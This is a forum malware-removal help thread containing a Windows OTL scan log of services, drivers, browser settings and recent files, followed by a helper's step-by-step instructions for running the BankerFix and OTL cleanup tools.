SRV - [2010/01/09 21:37:50 | 004,640,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)

SRV - [2010/01/09 21:18:00 | 000,149,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\Source Engine\OSE.EXE -- (ose)

SRV - [2009/07/13 23:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)

SRV - [2009/07/13 23:16:12 | 001,004,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\PeerDistSvc.dll -- (PeerDistSvc)

SRV - [2003/04/18 20:06:26 | 000,008,192 | ---- | M] () [Disabled | Stopped] -- C:\Windows\System32\srvany.exe -- (KMService)

========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\rdvgkmd.sys -- (VGPU)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\drivers\tsusbhub.sys -- (tsusbhub)

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\synth3dvsc.sys -- (Synth3dVsc)

DRV - [2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswsp.sys -- (aswSP)

DRV - [2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi)

DRV - [2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx)

DRV - [2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt)

DRV - [2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk)

DRV - [2013/10/21 14:12:37 | 000,178,304 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswVmm.sys -- (aswVmm)

DRV - [2013/10/21 14:12:37 | 000,079,720 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys -- (aswRdr)

DRV - [2013/10/21 14:12:37 | 000,049,944 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswRvrt.sys -- (aswRvrt)

DRV - [2012/09/15 16:59:31 | 000,242,240 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)

DRV - [2012/08/23 12:44:32 | 000,014,848 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)

DRV - [2012/08/23 12:40:25 | 000,049,664 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt)

DRV - [2010/11/20 10:30:15 | 000,175,360 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmbus.sys -- (vmbus)

DRV - [2010/11/20 10:30:15 | 000,040,704 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmstorfl.sys -- (storflt)

DRV - [2010/11/20 10:30:15 | 000,028,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\storvsc.sys -- (storvsc)

DRV - [2010/11/20 07:59:44 | 000,035,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb)

DRV - [2010/11/20 07:14:45 | 000,017,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VMBusHID.sys -- (VMBusHID)

DRV - [2010/11/20 07:14:41 | 000,005,632 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vms3cap.sys -- (s3cap)

DRV - [2009/07/13 20:09:17 | 004,194,816 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)

DRV - [2009/07/13 20:02:50 | 000,211,456 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\e1e6032.sys -- (e1express)

DRV - [2005/02/11 11:19:20 | 000,055,216 | ---- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\k750bus.sys -- (k750bus)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.google.com

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com

IE - HKLM\..\SearchScopes,DefaultScope =

IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://br.msn.com/?ocid=iehp

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = pt-br

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 93 66 3B FF A9 7E CC 01 [binary data]

IE - HKCU\..\SearchScopes,DefaultScope = {DB9BCD20-54F3-4A60-9865-B07BC3E63560}

IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKCU\..\SearchScopes\{DB9BCD20-54F3-4A60-9865-B07BC3E63560}: "URL" = http://www.google.com/search?hl=en&q={searchTerms}&rlz=1I7GGNI_pt-BRBR507

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "AutoConfigURL" = file://C:\ProgramData\ppctrl.dat

========== FireFox ==========

FF - prefs.js..browser.search.selectedEngine: "Google"

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..network.proxy.autoconfig_url: ""

FF - prefs.js..network.proxy.http: ""

FF - prefs.js..network.proxy.type: 2

FF - user.js - File not found

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()

FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf: C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\2011\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\2011\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\daplinkchecker@speedbit.com: C:\Program Files\DAP\daplinkchecker [2013/02/10 01:00:56 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{F17C1572-C9EC-4e5c-A542-D05CBB5C5A08}: C:\Program Files\DAP\DAPFireFox [2013/02/10 01:00:55 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2012/10/05 20:47:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Extensions

[2013/11/23 15:59:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions

[2013/10/06 10:06:43 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

[2013/11/23 15:59:57 | 000,382,345 | ---- | M] () (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\firefox\profiles\1t2pwtzw.default\extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi

[2013/10/05 22:41:09 | 000,000,000 | ---D | M] (No name found) -- C:\Arquivos de Programas\Mozilla Firefox\extensions

[2013/10/05 22:41:28 | 000,263,064 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll

[2013/10/05 22:41:22 | 000,001,240 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\buscape.xml

[2013/10/05 22:41:22 | 000,001,425 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\mercadolivre.xml

[2013/10/05 22:41:22 | 000,002,086 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

[2013/10/05 22:41:22 | 000,001,381 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-br.xml

[2013/10/05 22:41:22 | 000,001,165 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-br.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)

CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}

CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},

CHR - homepage: http://www.google.com

CHR - plugin: Widevine Content Decryption Module (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.1.376\_platform_specific\win_x86\widevinecdmadapter.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\PepperFlash\pepflashplayer.dll

CHR - plugin: Chrome Remote Desktop Viewer (Disabled) = internal-remoting-viewer

CHR - plugin: Native Client (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\ppGoogleNaClPluginChrome.dll

CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\pdf.dll

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL

CHR - plugin: Foxit Reader Plugin for Mozilla (Disabled) = C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll

CHR - plugin: Java Deployment Toolkit 7.0.450.18 (Enabled) = C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll

CHR - plugin: Java Platform SE 7 U45 (Enabled) = C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll

CHR - plugin: Google Update (Enabled) = C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll

CHR - Extension: YouTube Center = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcegdpionpopahcglnfiiioapcclamdj\2.0.1_0\

CHR - Extension: James White = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm\3_0\

CHR - Extension: DAP Link Checker = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bodfdknjhecmadheclfjkhhiofeagdbh\1.0.1.8_0\

CHR - Extension: Download Accelerator Plus (DAP) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffdcfjdljhbehggjdkdioajnknjcpbjb\2.0.11_0\

CHR - Extension: Windows Media Player Extension for HTML5 = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak\1.0_0\

CHR - Extension: Google Wallet = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\

O1 HOSTS File: ([2009/06/10 19:39:37 | 000,000,824 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts

O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O2 - BHO: (Java Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Arquivos de Programas\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Arquivos de Programas\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

O2 - BHO: (SpeedBit Link Verification Helper) - {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - C:\Arquivos de Programas\DAP\LinkVerifier.dll (Speedbit Ltd.)

O2 - BHO: (Java Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de Programas\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O4 - HKLM..\Run: [20131121] C:\Program Files\AVAST Software\Avast\setup\emupdate\2b520615-d68a-4492-a5e4-39b59408a272.exe (AVAST Software)

O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)

O4 - HKCU..\Run: [F.lux] C:\Users\2011\Local Settings\Apps\F.lux\flux.exe ()

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O8 - Extra context menu item: &Download with &DAP - C:\Arquivos de Programas\DAP\dapextie.htm ()

O8 - Extra context menu item: &Verify with DAP - C:\Arquivos de Programas\DAP\dapverify.htm ()

O8 - Extra context menu item: Download &all with DAP - C:\Arquivos de Programas\DAP\dapextie2.htm ()

O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: Sothink Flash Downloader For IE - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra Button: Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra 'Tools' menuitem : Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O13 - gopher Prefix: missing

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 1.6.0_30)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 186.194.224.2 189.51.144.3 8.8.8.8 8.8.4.4

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439}: DhcpNameServer = 186.194.224.2 189.51.144.3 8.8.8.8 8.8.4.4

O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Arquivos de Programas\Common Files\microsoft shared\Help\hxds.dll (Microsoft Corporation)

O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Arquivos de Programas\Common Files\Skype\Skype4COM.dll (Skype Technologies)

O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)

O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2009/06/10 19:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]

O34 - HKLM BootExecute: (autocheck autochk *)

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

========== Files/Folders - Created Within 30 Days ==========

[2013/12/04 20:43:51 | 000,000,000 | ---D | C] -- C:\_OTL

[2013/11/30 11:23:22 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/23 11:05:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp

[2013/11/17 13:08:42 | 000,000,000 | ---D | C] -- C:\AdwCleaner

[2013/11/17 11:13:19 | 000,000,000 | ---D | C] -- C:\Users\2011\Desktop\gmer

[2013/11/08 22:37:09 | 000,403,440 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/12/04 20:46:40 | 000,001,048 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job

[2013/12/04 20:46:20 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2013/12/04 20:46:15 | 1608,970,240 | -HS- | M] () -- C:\hiberfil.sys

[2013/12/04 20:05:47 | 000,001,052 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[2013/12/04 19:55:29 | 000,001,074 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000UA.job

[2013/12/03 22:55:00 | 000,001,022 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000Core.job

[2013/12/01 16:34:29 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2013/12/01 16:34:29 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2013/11/30 13:50:57 | 000,139,264 | ---- | M] () -- C:\Users\2011\Desktop\SystemLook.exe

[2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/22 22:38:34 | 000,663,606 | ---- | M] () -- C:\Windows\System32\prfh0416.dat

[2013/11/22 22:38:34 | 000,615,810 | ---- | M] () -- C:\Windows\System32\perfh009.dat

[2013/11/22 22:38:34 | 000,127,896 | ---- | M] () -- C:\Windows\System32\prfc0416.dat

[2013/11/22 22:38:34 | 000,106,190 | ---- | M] () -- C:\Windows\System32\perfc009.dat

[2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys

[2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys

[2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys

[2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys

[2013/11/08 22:36:35 | 000,269,216 | ---- | M] (AVAST Software) -- C:\Windows\System32\aswBoot.exe

[2013/11/08 22:36:35 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr

[2013/11/07 12:39:27 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/11/30 13:50:46 | 000,139,264 | ---- | C] () -- C:\Users\2011\Desktop\SystemLook.exe

[2013/03/03 22:17:49 | 000,178,304 | ---- | C] () -- C:\Windows\System32\drivers\aswVmm.sys

[2013/03/03 22:17:48 | 000,049,944 | ---- | C] () -- C:\Windows\System32\drivers\aswRvrt.sys

[2013/02/10 01:00:51 | 000,109,256 | ---- | C] () -- C:\Windows\System32\EasyHook64.dll

[2013/02/10 01:00:51 | 000,090,824 | ---- | C] () -- C:\Windows\System32\EasyHook32.dll

[2013/01/07 19:58:22 | 000,000,871 | ---- | C] () -- C:\Windows\QIII.INI

[2012/10/12 22:39:15 | 000,004,096 | -H-- | C] () -- C:\Users\2011\AppData\Local\keyfile3.drm

[2012/09/09 20:09:22 | 000,000,766 | ---- | C] () -- C:\Windows\ODBC.INI

[2012/08/25 15:28:41 | 000,026,624 | ---- | C] () -- C:\Windows\System32\ssb6mlm.dll

[2012/08/13 00:42:51 | 000,007,607 | ---- | C] () -- C:\Users\2011\AppData\Local\Resmon.ResmonCfg

[2012/08/12 21:56:40 | 000,178,688 | ---- | C] () -- C:\Windows\System32\unrar.dll

[2012/08/07 23:04:07 | 000,077,824 | ---- | C] () -- C:\Windows\KMService.exe

[2012/08/07 23:04:07 | 000,008,192 | ---- | C] () -- C:\Windows\System32\srvany.exe

[2012/08/07 22:52:48 | 000,080,896 | ---- | C] () -- C:\Windows\System32\RDVGHelper.exe

[2012/08/07 22:50:48 | 000,066,048 | ---- | C] () -- C:\Windows\System32\PrintBrmUi.exe

========== ZeroAccess Check ==========

[2009/07/14 02:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2013/07/25 23:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 10:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/13 23:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

========== LOP Check ==========

[2013/10/21 22:33:44 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\AVAST Software

[2012/08/12 21:47:52 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\BSplayer

[2012/09/09 16:52:57 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\BSplayer Pro

[2012/12/22 13:00:05 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Canneverbe Limited

[2013/06/07 19:30:38 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\DAEMON Tools Lite

[2013/05/25 20:21:10 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\EQATEC Analytics

[2012/12/19 19:47:24 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Foxit Software

[2013/06/27 20:35:06 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\PotPlayerMini

[2013/10/13 16:20:40 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\uTorrent

[2012/09/01 22:54:53 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Youtube Downloader HD

[2012/09/01 22:28:57 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Youtube to MP3 Converter

========== Purity Check ==========

< End of report >


Dear manoelvalerio

# Step no. 1 #

Download BankerFix and save it to your desktop.

  • Important: the tool will close Internet Explorer. Save any links you need before running it.
  • Double-click the BankerFix installer icon.
  • In the window that opens, click Run. Then click Yes.
  • A warning window will open; make sure your computer is connected to the Internet. Click OK.
  • You will notice some "movement" on the taskbar... In the window that opens, click OK to run the tool.
  • A prompt will open. Press any key to continue.
  • Wait...
  • Again, press any key to continue.
  • When it finishes, paste the contents of the file C:\LinhaDefensiva\relatorio.txt in your next reply.

After posting your reply you may delete the folder: C:\LinhaDefensiva

# Step no. 2 #

Again with OTL

  • Double-click the icon [image: 3984478580_7ed4cabc45_o.gif]
